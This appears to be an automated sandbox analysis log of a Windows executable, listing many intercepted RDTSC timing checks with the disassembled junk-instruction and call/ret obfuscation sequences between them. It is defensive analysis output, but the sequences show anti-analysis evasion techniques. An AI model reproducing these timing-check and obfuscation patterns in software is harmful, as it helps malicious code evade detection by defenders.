    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B636FC second address: B63727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB4CD3D7AB9h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jbe 00007FB4CD3D7AA6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B64175 second address: B64189 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD146840h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B64189 second address: B6418E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B64A02 second address: B64A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B64A06 second address: B64A0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6952F second address: B695A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD14683Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007FB4CD146849h 0x00000010 nop 0x00000011 movzx ebx, si 0x00000014 movzx edi, cx 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FB4CD146838h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov bx, ax 0x00000036 push 00000000h 0x00000038 pushad 0x00000039 sub dword ptr [ebp+122D2F78h], edx 0x0000003f jmp 00007FB4CD14683Ch 0x00000044 popad 0x00000045 xchg eax, esi 0x00000046 jl 00007FB4CD14683Eh 0x0000004c push ecx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6B5D0 second address: B6B5D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A7AF second address: B6A7B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6B5D4 second address: B6B5E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FB4CD3D7AA6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6B5E8 second address: B6B5EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6B5EC second address: B6B668 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D1A4Ah], edi 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FB4CD3D7AA8h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a pushad 0x0000002b jnc 00007FB4CD3D7AACh 0x00000031 push ecx 0x00000032 mov dword ptr [ebp+122D1AA3h], eax 0x00000038 pop ecx 0x00000039 popad 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007FB4CD3D7AA8h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 00000015h 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 movsx ebx, si 0x00000059 push eax 0x0000005a pushad 0x0000005b jbe 00007FB4CD3D7AA8h 0x00000061 push edi 0x00000062 pop edi 0x00000063 push eax 0x00000064 push edx 0x00000065 js 00007FB4CD3D7AA6h 0x0000006b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6C72A second address: B6C7B2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB4CD14683Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FB4CD146838h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 movsx ebx, dx 0x0000002a call 00007FB4CD146843h 0x0000002f mov ebx, dword ptr [ebp+122D3751h] 0x00000035 pop edi 0x00000036 mov ebx, dword ptr [ebp+122D37F5h] 0x0000003c push 00000000h 0x0000003e mov dword ptr [ebp+122D184Dh], eax 0x00000044 push 00000000h 0x00000046 push 00000000h 0x00000048 push edi 0x00000049 call 00007FB4CD146838h 0x0000004e pop edi 0x0000004f mov dword ptr [esp+04h], edi 0x00000053 add dword ptr [esp+04h], 00000015h 0x0000005b inc edi 0x0000005c push edi 0x0000005d ret 0x0000005e pop edi 0x0000005f ret 0x00000060 mov dword ptr [ebp+122D28B5h], ecx 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6C7B2 second address: B6C7C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD3D7AADh 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6B895 second address: B6B89F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6C7C4 second address: B6C7C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6C7C9 second address: B6C7CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6F7A8 second address: B6F7B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6F7B1 second address: B6F7B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6E922 second address: B6E945 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB4CD3D7AB9h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B718B3 second address: B718FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 mov ebx, eax 0x00000009 push 00000000h 0x0000000b and ebx, dword ptr [ebp+122D3785h] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FB4CD146838h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d push eax 0x0000002e pushad 0x0000002f jmp 00007FB4CD146840h 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B728A0 second address: B728C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB4CD3D7AB9h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B728C2 second address: B728CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B728CC second address: B728D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B728D0 second address: B72957 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FB4CD146838h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 or bh, FFFFFFFBh 0x00000025 mov edi, dword ptr [ebp+122D2EF2h] 0x0000002b push 00000000h 0x0000002d jmp 00007FB4CD146844h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007FB4CD146838h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e mov dword ptr [ebp+122D3278h], edx 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007FB4CD146843h 0x0000005c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72957 second address: B7295C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73B08 second address: B73B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73B0E second address: B73B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B719F6 second address: B719FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71AE8 second address: B71AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71AEC second address: B71AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71AF6 second address: B71AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B749C0 second address: B749C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73C03 second address: B73C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73C09 second address: B73C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73C0E second address: B73C14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70B8F second address: B70B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73C14 second address: B73CBB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB4CD3D7AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FB4CD3D7AA8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 push dword ptr fs:[00000000h] 0x00000030 sub ebx, dword ptr [ebp+12480356h] 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov dword ptr [ebp+122D1D36h], edi 0x00000043 mov dword ptr [ebp+122D1969h], edi 0x00000049 mov eax, dword ptr [ebp+122D0E21h] 0x0000004f push 00000000h 0x00000051 push ebx 0x00000052 call 00007FB4CD3D7AA8h 0x00000057 pop ebx 0x00000058 mov dword ptr [esp+04h], ebx 0x0000005c add dword ptr [esp+04h], 00000014h 0x00000064 inc ebx 0x00000065 push ebx 0x00000066 ret 0x00000067 pop ebx 0x00000068 ret 0x00000069 movzx edi, bx 0x0000006c mov ebx, dword ptr [ebp+122D3761h] 0x00000072 push FFFFFFFFh 0x00000074 push esi 0x00000075 jnl 00007FB4CD3D7ABBh 0x0000007b pop ebx 0x0000007c nop 0x0000007d jnp 00007FB4CD3D7AB0h 0x00000083 pushad 0x00000084 pushad 0x00000085 popad 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B74C4B second address: B74C51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75B24 second address: B75B2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FB4CD3D7AA6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B74C51 second address: B74C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75B2E second address: B75B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B74C55 second address: B74C59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77A1E second address: B77A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75B32 second address: B75B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B74C59 second address: B74C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop esi 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75B43 second address: B75B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75B49 second address: B75C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov edi, dword ptr [ebp+122D3755h] 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov ebx, dword ptr [ebp+122D354Dh] 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 call 00007FB4CD3D7AADh 0x00000026 mov ebx, 1153C046h 0x0000002b pop ebx 0x0000002c mov eax, dword ptr [ebp+122D14B9h] 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007FB4CD3D7AA8h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 0000001Bh 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c mov dword ptr [ebp+1248285Ch], esi 0x00000052 push FFFFFFFFh 0x00000054 push 00000000h 0x00000056 push ecx 0x00000057 call 00007FB4CD3D7AA8h 0x0000005c pop ecx 0x0000005d mov dword ptr [esp+04h], ecx 0x00000061 add dword ptr [esp+04h], 00000016h 0x00000069 inc ecx 0x0000006a push ecx 0x0000006b ret 0x0000006c pop ecx 0x0000006d ret 0x0000006e jmp 00007FB4CD3D7AABh 0x00000073 nop 0x00000074 jnc 00007FB4CD3D7ABBh 0x0000007a push eax 0x0000007b push eax 0x0000007c push edx 0x0000007d jmp 00007FB4CD3D7AB1h 0x00000082 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75C07 second address: B75C16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB4CD14683Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7F116 second address: B7F11B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7F28A second address: B7F290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7F290 second address: B7F294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7F294 second address: B7F2A4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnc 00007FB4CD146836h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7F2A4 second address: B7F2AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1726E second address: B1728C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007FB4CD146840h 0x0000000b jg 00007FB4CD146836h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1728C second address: B17291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8B808 second address: B8B813 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop esi 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8B813 second address: B8B82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB4CD3D7AAEh 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8C196 second address: B8C19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8C19A second address: B8C1A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8C1A0 second address: B8C1AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8C1AA second address: B8C1E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD3D7AAFh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FB4CD3D7AAFh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB4CD3D7AB0h 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8C1E3 second address: B8C1FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD14683Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8C1FB second address: B8C200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8C36D second address: B8C3B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FB4CD146842h 0x0000000b jmp 00007FB4CD14683Bh 0x00000010 popad 0x00000011 jl 00007FB4CD146853h 0x00000017 jmp 00007FB4CD146847h 0x0000001c jp 00007FB4CD146836h 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8C3B8 second address: B8C3BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8C3BC second address: B8C3D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jmp 00007FB4CD14683Fh 0x00000011 pop esi 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8C3D8 second address: B8C3DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8C3DD second address: B8C3E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9021E second address: B90226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B90226 second address: B9022A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B157F0 second address: B15806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FB4CD3D7AB1h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15806 second address: B15820 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jnl 00007FB4CD146836h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jo 00007FB4CD146836h 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9BCE1 second address: B9BCF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push ebx 0x00000008 jc 00007FB4CD3D7AA6h 0x0000000e pop ebx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F928 second address: B1F92E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9AAA0 second address: B9AAC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB4CD3D7AB6h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f push edi 0x00000010 pop edi 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop ecx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9AC6C second address: B9AC70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9AC70 second address: B9AC74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9AC74 second address: B9AC90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB4CD146843h 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9AF6E second address: B9AF74 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B0C2 second address: B9B0C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
